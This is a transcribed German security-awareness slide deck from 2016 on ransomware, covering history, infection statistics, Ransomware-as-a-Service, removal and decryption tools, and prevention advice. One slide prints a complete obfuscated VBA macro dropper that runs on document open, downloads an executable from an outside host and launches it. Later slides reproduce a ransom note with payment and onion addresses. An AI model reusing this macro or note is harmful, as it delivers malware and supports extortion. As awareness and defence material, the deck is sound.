die dunkle Seite der Macht

Transcription

die dunkle Seite der Macht
Die Spezialisten.
Meister auf Ihrem Gebiet.
Matthias Hirsch
Ransomware – die dunkle Seite der Macht
Ransomware – die dunkle Seite der Macht
Der Reihe nach…









1996
2006
2010
2011
2012
2013
2014
2015
Februar 2016

März 2016

April 2016
© by ITRIS 2016
Prof. Moti Yung und Adam L. Young (Columbia Universität) dokumentieren Ransomware
taucht das erste Mal eine "Ransomware" auf ("GTOP")
Umfrage zu Ransomeware: ein Viertel aller 3'000 Befragten würde Lösegeld zahlen…
Ransomware taucht in Varianten auf
über 16 kriminelle "Gangs" entwickeln und verbreiten Ransomware
Erste Variante der CryptoWall Ransomware wird entdeckt
über 8.8 Millionen Attacken
TOX Toolkit online verfügbar / Ransomware FakeBsod verteilt sich / CryptoWall Attacken
Locky infiziert über 17'000 Rechner innert 24h in Deutschland
(im weiteren Verlauf steigt die Zahl auf über 5'000 Rechner pro Stunde!)
Ransomware "KeRanger" auf Mac OSX / TeslaCrypt 4.0 aufgetaucht / Surprise
(Verbreitung über TeamViewer) entdeckt / Petya verbreitet sich über Dropbox
Ransomware SAMSAM entdeckt (nutzt Exploit-Kit)
Quelle: https://blog.fortinet.com/post/cryptowall-another-ransomware-menace / https://blog.fortinet.com/post/new-cryptowall-variant-in-the-wild
http://www.heise.de/security/meldung/Erpresser-ruesten-nach-Verschluesselungs-Trojaner-TeslaCrypt-4-0-gesichtet-3145559.html
Seite 2
Ransomware – die dunkle Seite der Macht
Microsoft Malware-Statistik
Top 10 Ransomware November 2015
© by ITRIS 2016
Quelle: https://www.microsoft.com/security/portal/mmpc/shared/ransomware.aspx
Fortinet Malware-Statistik
Top 3 Ransomware Februar 2016
(18.6 Millionen Infizierungen!)
Quelle: http://blog.fortinet.com/post/cryptowall-teslacrypt-and-locky-a-statistical-perspective
Seite 3
Ransomware – die dunkle Seite der Macht
© by ITRIS 2016
Quelle: Trendmicro
Seite 4
Ransomware – die dunkle Seite der Macht
"Kriegsschauplatz"


Februar 2016
Februar 2016

Februar 2016

März 2016
Ergebnis
 2015
 2016
© by ITRIS 2016
Spital "Hollywood Presbyterian Medical Center", Los Angeles zahlt 40 Bitcoins (ca. €15k)
Lukasklinik, Neuss über 3 Tage IT Betrieb lahmgelegt
(zwei weitere Krankenhäuse in Nordrhein-Westfalen betroffen)
Locky infiziert über 17'000 Rechner innert 24h in Deutschland
(im weiteren Verlauf steigt die Zahl auf über 5'000 Rechner pro Stunde!)
Bayrische Behörde mit über 1' 900MA / über 1 Million Dateien verschlüsselt
Schaden: ca. EUR 500'000
Laut Aufzeichnungen des FBI wurden 2015 über 18 Millionen US Dollar erpresst
über 300 Millionen US Dollar Erpressungsgeld prognostiziert
Quelle: http://www1.wdr.de/cyberangriff-lukaskrankenhaus-neuss-100.html / https://blog.botfrei.de/2015/06/krypto-trojaner-schaeden-gehen-in-die-millarden/
Seite 5
Ransomware – die dunkle Seite der Macht
Die dunkle Seite der Macht…
E-Mail mit Anhang
Kompromittierte Webseite
Die "Verführung"…
Sicherheitsleck
"Honeypot"-Applikation
© by ITRIS 2016
Seite 6
Ransomware – die dunkle Seite der Macht
Wofür steht "Ransomware"
 Ransom… = Lösegelt (to ransom = freikaufen)
 …ware
= Abkürzung für "Malware" (= Schadsoftware)
"Ransomware-as-a-Service" (RaaS)
 Serviceplattform für Ransomware
(z.B. "TOX" => Botnetz) seit 05/2015
 Analysieren von Endgeräten
 Generieren von RSA Schlüssel
mit autom. Austausch
 Autom. Abrechnung mit Nutzer
 Oft wechselnde Domänen
SDK …
 http://utkusen.com/en/projects.html
 https://malwr.com
 Hidden-Tear
© by ITRIS 2016
Quelle: http://thehackernews.com/2015/05/ransomware-creator.html / https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us/
Seite 7
Ransomware – die dunkle Seite der Macht
So entsteht ein Ransomware-Trojaner
1. Als Benutzer bei einem RaaS Anbieter
mit Bitcoin-Wallet Adresse anmelden
2. Malware Service "buchen"
3. Ransomware im GUI definieren
4. Gewünschtes Format herunterladen
und verbreiten
… fertig!
© by ITRIS 2016
Quelle: http://arstechnica.com/security/2016/01/researchers-uncover-javascript-based-ransomware-as-service/
Seite 8
Ransomware – die dunkle Seite der Macht
Wie funktioniert Ransomware?
Allgemeines
 Office Programme => Ausführung von Makros
 Angriff wird über WebServer ("BotNetz")gesteuert…
in Microsoft Office
 Doch wie wird der Server erreichbar?
 => die URL ist nicht im Klartext ersichtlich - sondern…
 Zugriff wird aus Makro (z.B. VBA) dynamisch zusammengebaut
(z.B. als Array mit Zahlenwerten, die einzeln in Buchstaben und in Folge in eine komplexe URL als
Zeichenkette zusammengebaut werden)
 URL wechseln sehr rasch die Domäne
d.h. es ist schwierig den WebServer der Ransomware steuert ausfindig machen zu können
via E-Mails
 wird gerne JavaScript verwendet… und auch dort nach gleichem Prinzip
die URL erst dynamisch erstellt um den Zugriff nicht erkennbar zu machen…
© by ITRIS 2016
Seite 9
Ransomware – die dunkle Seite der Macht
Aufbau und Wirkungsweise
 Macro / VBA / VBSCRIPT / JavaScript erstellt dynamischen
Aufruf einer URL
 Aufruf der URL agiert als Trojaner und ermöglicht Transfer
des eigentlichen Virus in das lokale System
 Ransomware Virusprogramm aktiviert sich durch Einträge
in der Registry an verschiedenen Stellen
 Spätestens nach einem Neustart wird der Virus aktiv
 Verschlüsselung basiert nach dem Prinzip von RSA / PGP
(Interaktion mit Webserver für Schlüsselaustausch)
 Datenverschlüsselung läuft…
Beispiel für Trojaner in VBscript
Sub sampler()
Dim prunella As Variant
Dim dabchick As String
Dim misogynous As Long
immobility
remover.torment
End Sub
Sub immobility()
Dim sparsim As Object
Dim playpen As String
Dim beech As String
demonstrating = "seam.exe"
suffragist = Mid("meanwhileExexemplification", 10, 2) + Left("pandEnantiquated", 6) + "vironmentStrings"
Dim nacimiento As String
Set hardy = VBA.CreateObject(Right("epimediumWScr", 4) + "ipt.She" + Mid("flatllboom", 5, 2) + "")
matriculation = 45 + 89 - 72
lysis = 50 + 38
If matriculation + lysis > 96 Then
womanly = Left("genwellformed", 3) + "otypi" + "cal" + ""
End If
playpen = CallByName(hardy, suffragist, 1, "%temp%")
scapulary = 109 - 127 + 93
oneeyed = 94 - 26
If scapulary + oneeyed> 50 Then
comptes = StrReverse("as") + Right("coddlecre", 3) + "" + Mid("enormousbrigandage", 9,
0)
End If
beech = playpen & "\pteaparty" & demonstrating
Set carunculate = remover.clanger
commanding = #8:34:50 AM#
stuccco = Hour(commanding)
beneplacito = remover.mastitis(carunculate, beech)
unreasoning = #7:48:11 PM#
tinamou = Hour(unreasoning)
poorwill = 3 + 57
academician = 104 - 3 - 33
If poorwill + academician > 21 Then
blatherskite = "ash" + "toret" + "h"
End If
cityx = CallByName(hardy, "Run", VbMethod, beech)
End Sub
Sub AutoOpen()
ambystomatidae = #8:29:22 PM#
sordes = Hour(ambystomatidae)
sampler
End Sub
Public Function flirting() As String
Dim yarmulke As Variant
Dim forge As Object
Dim incivism As Integer
flirting = ActiveDocument.BuiltInDocumentProperties("Author")
End Function
Function clanger()
On Error Resume Next
atticus = "Ms" + "xml2." + Mid("backhandedXMLHTTPnational", 11, 7) + Right("ceremoniousness", 0)
Set clanger = CreateObject(atticus)
cartes = StrReverse("TEG")
aegilops = CallByName(clanger, "open", VbMethod, cartes, "http://iamthewinnerhere.com/80.exe", False)
affixed = 114 + 12 - 68
appertain = 72 - 15
If affixed + appertain > 83 Then
auxetic = StrReverse("me") + Mid("exemplarbiotocidaearilus", 9, 10)
End If
clanger.send
GoTo ampleness
cortical:
clanger = 0
ampleness:
End Function
Function mastitis(vespula, amazement)
cola = 62 - 61
belonidae = remover.flirting
cryostat = Left(belonidae, 2)
atticus = cryostat + "o" + "db" + ".Str" + Right("unpremeditatedeam", 3) + Left("savory", 0)
Set buccaneer = CreateObject(atticus)
noncombining = CallByName(buccaneer, "Open", VbMethod)
buccaneer.Type = 15 - 14
aegilops = CallByName(buccaneer, "Wr" + StrReverse("eti") + "" + Right("freeze", 0), cola, vespula.responseBody)
neologic = 43 + 7
categorical = 97 - 40 + 22
If neologic + categorical > 70 Then
disguised = "ac" + "ting"
End If
normative = CallByName(buccaneer, "Sav" + "eToFi" + Right("acescentle", 2), VbMethod, amazement, 124 - 123)
End Function
© by ITRIS 2016
Quelle: https://gist.githubusercontent.com/anonymous/1de693b39d974fc3708f/raw/18a29d823d8d9191ebca689e2ec9669b2575f5eb/newcwcs1
Seite 10
© by ITRIS 2016
Seite 11
Ransomware – die dunkle Seite der Macht
Bitcoin – Renaissance einer elektronischen "OpenSource Währung"
 Anerkanntes Zahlungsmittel (EURO)
 Kauf und Verkauf erfolgt via SEPA Überweisung
(Single Euro Payments Area)
 Bitcoin-Wallet Adresse ist Basis
 Identifizierung der Handelspartner ist nicht möglich
 Anonymität ist aber auch nicht garantiert
Vereinfacht ausgedrückt:
© by ITRIS 2016
Quelle: https://bitcoinblog.de/2016/04/22/dunkel-dunkler-internet/ / https://bitcoin.org/de/
Seite 12
Ransomware – die dunkle Seite der Macht
© by ITRIS 2016
Quelle: https://blog.fortinet.com/post/threat-intelligence-sharing-at-work-cyber-threat-alliance-tracks-cryptowall-version-3 / http://cyberthreatalliance.org/cryptowall-dashboard.html
Seite 13
Ransomware – die dunkle Seite der Macht
© by ITRIS 2016
Seite 14
Ransomware – die dunkle Seite der Macht
Nun zur Live-Demo… 
© by ITRIS 2016
Seite 15
© by ITRIS 2016
Seite 16
Ransomware – die dunkle Seite der Macht
Wie zeigt sich das "Ergebnis" …
Bildinhalt
Verzeichnisinhalt
© by ITRIS 2016
Seite 17
Ransomware – die dunkle Seite der Macht
What's the matter with your files?
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
NOT YOUR LANGUAGE? USE https://translate.google.com
Your data was secured using a strong encryption with RSA4096.
Use the link down below to find additional information on the encryption keys using
RSA-4096 https://en.wikipedia.org/wiki/RSA_(cryptosystem)
What's the matter with your files?
Your data was secured using a strong encryption with RSA4096.
Use the link down below to find additional information on the encryption keys using
RSA-4096 https://en.wikipedia.org/wiki/RSA_(cryptosystem)
What exactly that means?
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
What exactly that means?
It means that on a structural level your files have been transformed.
You won't be able to use , read , see or work with them anymore .
In other words they are useless, however, there is a possibility
to restore them with our help.
What exactly happened to your files ???
*** Two personal RSA-4096 keys were generated for your PC/Laptop;
one key is public, another key is private.
*** All your data and files were encrypted by the means of the public key,
which you received over the web .
*** In order to decrypt your data and gain access to your computer you
need a private key and a decryption software, which can be found
on one of our secret servers.
© by ITRIS 2016
It means that on a structural level your files have been transformed . You won't be able to use , read , see or work with them anymore .
In other words they are useless , however , there is a possibility to restore them with our help .
What exactly happened to your files ???
*** Two personal RSA-4096 keys were generated for your PC/Laptop; one key is public, another key is private.
*** All your data and files were encrypted by the means of the public key , which you received over the web .
*** In order to decrypt your data and gain access to your computer you need a private key and a decryption software,
which can be found on one of our secret servers.
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
What should you do next ?
There are several options for you to consider :
*** You can wait for a while until the price of a private key will raise, so you will have to pay twice as much to access your files or
*** You can start getting BitCoins right now and get access to your data quite fast .
In case you have valuable files , we advise you to act fast as there is no other option rather
than paying in order to get back your data.
In order to obtain specific instructions , please access your personal homepage by choosing one of the few addresses down below :
http://as3ws.fopyirr.com/E0363558AE894DAA
http://o4dm3.leaama.at/E0363558AE894DAA
http://i5ndw.titlecorta.at/E0363558AE894DAA
If you can't access your personal homepage or the addresses are not working, complete the following steps:
*** Download TOR Browser - http://www.torproject.org/projects/torbrowser.html.en
*** Install TOR Browser and open TOR Browser
*** Insert the following link in the address bar: xzjvzkgjxebzreap.onion/E0363558AE894DAA
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
***************IMPORTANT*****************INFORMATION********************
Your personal homepages
http://as3ws.fopyirr.com/E0363558AE894DAA
http://o4dm3.leaama.at/E0363558AE894DAA
http://i5ndw.titlecorta.at/E0363558AE894DAA
Your personal homepage Tor-Browser xzjvzkgjxebzreap.onion/E0363558AE894DAA
Your personal ID E0363558AE894DAA
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
Seite 18
Ransomware – die dunkle Seite der Macht
What should you do next?
There are several options for you to consider :
*** You can wait for a while until the price of a private key will raise,
so you will have to pay twice as much to access your files or
*** You can start getting BitCoins right now and get access to your data quite fast .
In case you have valuable files , we advise you to act fast as there is no other
option rather than paying in order to get back your data.
In order to obtain specific instructions , please access your personal homepage by choosing one
of the few addresses down below:
http://as3ws.fopyirr.com/E0363558AE894DAA
http://o4dm3.leaama.at/E0363558AE894DAA
http://i5ndw.titlecorta.at/E0363558AE894DAA
If you can't access your personal homepage or the addresses are not working,
complete the following steps:
*** Download TOR Browser - http://www.torproject.org/projects/torbrowser.html.en
*** Install TOR Browser and open TOR Browser
*** Insert the following link in the address bar: xzjvzkgjxebzreap.onion/E0363558AE894DAA
**************IMPORTANT*****************INFORMATION********************
Your personal homepages
http://as3ws.fopyirr.com/E0363558AE894DAA
http://o4dm3.leaama.at/E0363558AE894DAA
http://i5ndw.titlecorta.at/E0363558AE894DAA
© by ITRIS 2016
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
NOT YOUR LANGUAGE? USE https://translate.google.com
What's the matter with your files?
Your data was secured using a strong encryption with RSA4096.
Use the link down below to find additional information on the encryption keys using
RSA-4096 https://en.wikipedia.org/wiki/RSA_(cryptosystem)
What exactly that means?
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
It means that on a structural level your files have been transformed . You won't be able to use , read , see or work with them anymore .
In other words they are useless , however , there is a possibility to restore them with our help .
What exactly happened to your files ???
*** Two personal RSA-4096 keys were generated for your PC/Laptop; one key is public, another key is private.
*** All your data and files were encrypted by the means of the public key , which you received over the web .
*** In order to decrypt your data and gain access to your computer you need a private key and a decryption software,
which can be found on one of our secret servers.
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
What should you do next ?
There are several options for you to consider :
*** You can wait for a while until the price of a private key will raise, so you will have to pay twice as much to access your files or
*** You can start getting BitCoins right now and get access to your data quite fast .
In case you have valuable files , we advise you to act fast as there is no other option rather
than paying in order to get back your data.
In order to obtain specific instructions , please access your personal homepage by choosing one of the few addresses down below :
http://as3ws.fopyirr.com/E0363558AE894DAA
http://o4dm3.leaama.at/E0363558AE894DAA
http://i5ndw.titlecorta.at/E0363558AE894DAA
If you can't access your personal homepage or the addresses are not working, complete the following steps:
*** Download TOR Browser - http://www.torproject.org/projects/torbrowser.html.en
*** Install TOR Browser and open TOR Browser
*** Insert the following link in the address bar: xzjvzkgjxebzreap.onion/E0363558AE894DAA
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
***************IMPORTANT*****************INFORMATION********************
Your personal homepages
http://as3ws.fopyirr.com/E0363558AE894DAA
http://o4dm3.leaama.at/E0363558AE894DAA
http://i5ndw.titlecorta.at/E0363558AE894DAA
Your personal homepage Tor-Browser xzjvzkgjxebzreap.onion/E0363558AE894DAA
Your personal ID E0363558AE894DAA
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
Seite 19
Ransomware – die dunkle Seite der Macht
Was tun bei Befall
 Feststellen, von welcher Ransomware man betroffen ist:
https://id-ransomware.malwarehunterteam.com/index.php?lang=de_DE
Anleitungen um bislang bekannte Ransomware zu entfernen








.Lock
Cerber
JigSaw
Locky
Maktub
Petya
SamSam
Teslacrypt
© by ITRIS 2016
http://howtoremove.guide/lock-file-virus-removal/
http://howtoremove.guide/cerber-ransomware-virus-removal/
http://howtoremove.guide/jigsaw-ransomware-virus-removal/
http://howtoremove.guide/locky-virus-ransomware-file-removal/ & http://nabzsoftware.com/types-of-threats/locky-file
http://howtoremove.guide/maktub-locker-virus-ransomware-removal/
http://howtoremove.guide/petya-ransomware-virus-removal/
http://howtoremove.guide/samsam-ransomware-removal/
http://howtoremove.guide/teslacrypt-4-0-virus-ransomware-removal/
Seite 20
Ransomware – die dunkle Seite der Macht
Software um Ransomware zu entfernen

ESET Rogue Application Remover verwenden um Ransomware zu entfernen
32-bit Version – http://download.eset.com/special/ERARemover_x86.exe
64-bit Version – http://download.eset.com/special/ERARemover_x64.exe



EU-Cleaner (https://www.botfrei.de/eucleaner.html)
Malwarebytes Anti-Malware (https://www.malwarebytes.org/mwb-download/)
Microsoft Windows Malicious Software Removal Tool verwenden
(https://www.microsoft.com/en-us/download/malicious-software-removal-tool-details.aspx)

SpyHunter
© by ITRIS 2016
(http://bugfighter.enigma.revenuewire.net/spyhunter2/download/)
Quelle: http://www.chip.de/news/Erpresser-Trojaner-bekaempfen-Schutz-und-Entfernen-von-Ransomware_92035897.html / http://malwarefixes.com/remove-cryptowall-ransomware/
Seite 21
Ransomware – die dunkle Seite der Macht
Welche Ransomware kann entschlüsselt werden?
Zuerst: Ransomware Prozess stoppen (Taskmanager via STRG+ALT+DEL aufrufen und Prozess stoppen)
 AutoLocky
Emsisoft Decrypter for AutoLocky
 Bitcryptor
Kaspersky Ransomware Decryptor (https://noransom.kaspersky.com/)
 JigSaw
JigSawDecrypter (https://download.bleepingcomputer.com/demonslay335/JigSawDecrypter.zip)
 Petya
Bitdefender Petya Vaccine (http://download.bitdefender.com/am/cw/BDAntiRansomwareSetup.exe)
oder/und
Petya Sector Extractor (http://www.chip.de/downloads/Petya-Sector-Extractor_92236730.html)
 TeslaCrypt
TeslaDecoder (http://download.bleepingcomputer.com/BloodDolly/TeslaDecoder.zip)
 …?
Weitere Hilfsprogramme um von Ransomware verschlüsselte Daten wieder herzustellen:
 Panda Ransomware Decrypt (http://www.pandasecurity.com/resources/tools/pandaunransom.exe)
 SARDU (http://www.sarducd.it/de/index.html)
 TALOS (http://www.talosintel.com/teslacrypt_tool/)
 Trendmicro Anti-Ransomware Tool (https://esupport.trendmicro.com/en-us/home/pages/technical-support/1105975.aspx)
© by ITRIS 2016
Quelle: http://www.chip.de/news/Erpresser-Trojaner-bekaempfen-Schutz-und-Entfernen-von-Ransomware_92035897.html
Seite 22
Ransomware – die dunkle Seite der Macht
Prävention
Sandbox
Antispam
Patchmanagement / Updates
Antivirenschutz
EXTERN
INTERN
Antivirenschutz
Application-Control
© by ITRIS 2016
Datensicherung
Schwachstellen-Analyse
Seite 23
Ransomware – die dunkle Seite der Macht
Prävention
 Organisatorisch
 Regelmässig über aktuelle Bedrohungen (verständlich) informieren
 Mitarbeiter sensibilisieren (Training)

Technisch







Windows / Mac OSX Updates regelmässig installieren
Scan-Engine des Antivirenschutz regelmässig aktualisieren / bei Mac OSX "Xprotect" aktualisieren
Einstellungen zum Antivirenschutz nach Herstellervorgaben nachführen
Application-Control auf dem Gateway in Betracht ziehen
Spamfilter-Einstellungen anpassen
Regelmässige Komplettsuche auf Endgeräte und Server durchführen
System-Imaging und Datensicherung regelmässig kontrollieren, Konzept überprüfen
und Wiederherstellungsvorgänge durchführen
 Schwachstellen-Analyse zur IT Infrastruktur durchführen lassen
© by ITRIS 2016
Seite 24
Ransomware – die dunkle Seite der Macht
Fragen?
Kontakt: www.itris.ch
© by ITRIS 2016
Seite 25